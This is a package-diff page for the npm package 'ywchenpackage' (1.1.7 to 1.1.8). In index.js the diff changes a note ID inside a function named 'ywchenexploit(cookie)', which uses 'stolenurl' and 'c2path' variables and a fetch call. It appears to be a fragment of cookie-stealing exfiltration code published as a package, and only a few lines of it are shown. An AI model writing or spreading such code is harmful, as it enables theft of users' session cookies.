RubyGems
npm
Organizations
Log in
Sign up
npm
ywchenpackage
Versions diffs
1.1.7 → 1.1.8
ywchenpackage 1.1.7 → 1.1.8
Sign up to get
free
protection for your applications and to get access to all the features.
Files changed (2)
hide
show
package/index.js
+1
-1
package/package.json
+1
-1
package/index.js
CHANGED
Viewed
@@ -1,5 +1,5 @@
1
1
function ywchenexploit(cookie) {
2
-
let stolenurl = "/api/notes?id=
eba466ce
-
1a08
-
4664
-
9111
-
f2f60319439a
";
2
+
let stolenurl = "/api/notes?id=
a83ed14e
-
8c1c
-
43c3
-
ad7a
-
b5393ad85a3d
";
3
3
let c2path = "/api/notes";
4
4
fetch(stolenurl)
5
5
.then(
package/package.json
CHANGED
Viewed
@@ -1,6 +1,6 @@
1
1
{
2
2
"name": "ywchenpackage",
3
-
"version": "1.1.
7
",
3
+
"version": "1.1.
8
",
4
4
"description": "",
5
5
"main": "index.js",
6
6
"scripts": {